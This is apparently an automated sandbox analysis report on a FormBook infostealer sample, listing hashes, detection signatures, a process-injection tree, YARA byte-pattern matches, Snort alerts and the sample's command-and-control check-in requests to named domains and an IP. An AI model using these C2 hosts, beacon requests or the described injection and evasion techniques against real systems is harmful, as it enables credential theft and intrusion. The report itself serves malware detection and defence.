
Analysis Report 74852.exe

Overview

General Information

Sample Name: 74852.exe
Analysis ID: 339342
MD5: e295cb54968cb6f3575a7caf32fe7f5a
SHA1: 84405250603351ebe538e7ae34812704c0c3f480
SHA256: 15198bfd2fbc367f07a22c6b39ea4e658dfea4a51b74cb4a653eb4b936ad3db0
Tags: exe, GoDaddy

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 74852.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)
    • 74852.exe (PID: 5884 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\74852.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.74852.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.74852.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.74852.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x17619:$sqlite3step: 68 34 1C 7B E1
    • 0x1772c:$sqlite3step: 68 34 1C 7B E1
    • 0x17648:$sqlite3text: 68 38 2A 90 C5
    • 0x1776d:$sqlite3text: 68 38 2A 90 C5
    • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.74852.exe.2fa0000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.74852.exe.2fa0000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 74852.exe | Avira: detected
Found malware configuration
Source: 0.2.74852.exe.2fa0000.2.unpack | Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: 74852.exe | ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 74852.exe | Joe Sandbox ML: detected
Source: 0.2.74852.exe.2fa0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.74852.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 74852.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 74852.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 74852.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
Source: global traffic | HTTP traffic detected: GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.pciappky.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.borokish.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1 Host: www.wingateofhouston.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: TEBYANIR
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: unknown | DNS traffic detected: queries for: www.pciappky.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.260457732.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 74852.exe, 00000000.00000002.244473079.000000000147A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0041A060 NtClose, 1_2_0041A060
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0041A110 NtAllocateVirtualMemory, 1_2_0041A110
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_00419F30 NtCreateFile, 1_2_00419F30
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_00419FE0 NtReadFile, 1_2_00419FE0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0041A05A NtClose, 1_2_0041A05A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0041A10B NtAllocateVirtualMemory, 1_2_0041A10B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_00419FDA NtReadFile, 1_2_00419FDA
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459540 NtReadFile, LdrInitializeThunk, 1_2_01459540
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459910 NtAdjustPrivilegesToken, LdrInitializeThunk, 1_2_01459910
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014595D0 NtClose, LdrInitializeThunk, 1_2_014595D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014599A0 NtCreateSection, LdrInitializeThunk, 1_2_014599A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459840 NtDelayExecution, LdrInitializeThunk, 1_2_01459840
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459860 NtQuerySystemInformation, LdrInitializeThunk, 1_2_01459860
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014598F0 NtReadVirtualMemory, LdrInitializeThunk, 1_2_014598F0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459710 NtQueryInformationToken, LdrInitializeThunk, 1_2_01459710
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459780 NtMapViewOfSection, LdrInitializeThunk, 1_2_01459780
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014597A0 NtUnmapViewOfSection, LdrInitializeThunk, 1_2_014597A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459A50 NtCreateFile, LdrInitializeThunk, 1_2_01459A50
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459660 NtAllocateVirtualMemory, LdrInitializeThunk, 1_2_01459660
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459A00 NtProtectVirtualMemory, LdrInitializeThunk, 1_2_01459A00
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459A20 NtResumeThread, LdrInitializeThunk, 1_2_01459A20
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014596E0 NtFreeVirtualMemory, LdrInitializeThunk, 1_2_014596E0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459950 NtQueueApcThread, 1_2_01459950
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459560 NtWriteFile, 1_2_01459560
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459520 NtWaitForSingleObject, 1_2_01459520
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0145AD30 NtSetContextThread, 1_2_0145AD30
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014599D0 NtCreateProcessEx, 1_2_014599D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014595F0 NtQueryInformationFile, 1_2_014595F0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0145B040 NtSuspendThread, 1_2_0145B040
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01459820 NtEnumerateKey, 1_2_01459820
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014598A0 NtWriteVirtualMemory,1_2_014598A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459760 NtOpenProcess,1_2_01459760
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459770 NtSetInformationFile,1_2_01459770
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A770 NtOpenThread,1_2_0145A770
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459B00 NtSetValueKey,1_2_01459B00
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A710 NtOpenProcessToken,1_2_0145A710
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459730 NtQueryVirtualMemory,1_2_01459730
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459FE0 NtCreateMutant,1_2_01459FE0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A3B0 NtGetContextThread,1_2_0145A3B0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459650 NtQueryValueKey,1_2_01459650
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459670 NtQueryInformationProcess,1_2_01459670
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459610 NtEnumerateValueKey,1_2_01459610
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A10 NtQuerySection,1_2_01459A10
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014596D0 NtCreateKey,1_2_014596D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A80 NtOpenDirectoryObject,1_2_01459A80
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E1471_2_0041E147
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D27D1_2_0041D27D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E3B61_2_0041E3B6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E74D1_2_0041E74D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1D551_2_014E1D55
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141F9001_2_0141F900
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2D071_2_014E2D07
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01410D201_2_01410D20
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014341201_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E25DD1_2_014E25DD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E01_2_0142D5E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014425811_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DD4661_2_014DD466
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D10021_2_014D1002
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142841F1_2_0142841F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E28EC1_2_014E28EC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B0901_2_0142B090
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A01_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E20A81_2_014E20A8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2B281_2_014E2B28
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DDBD21_2_014DDBD2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1FF11_2_014E1FF1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144EBB01_2_0144EBB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01436E301_2_01436E30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2EF71_2_014E2EF7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E22AE1_2_014E22AE
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 0141B150 appears 35 times
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 00237C6A appears 60 times
          Source: 74852.exe, 00000000.00000003.241665351.000000001C90F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
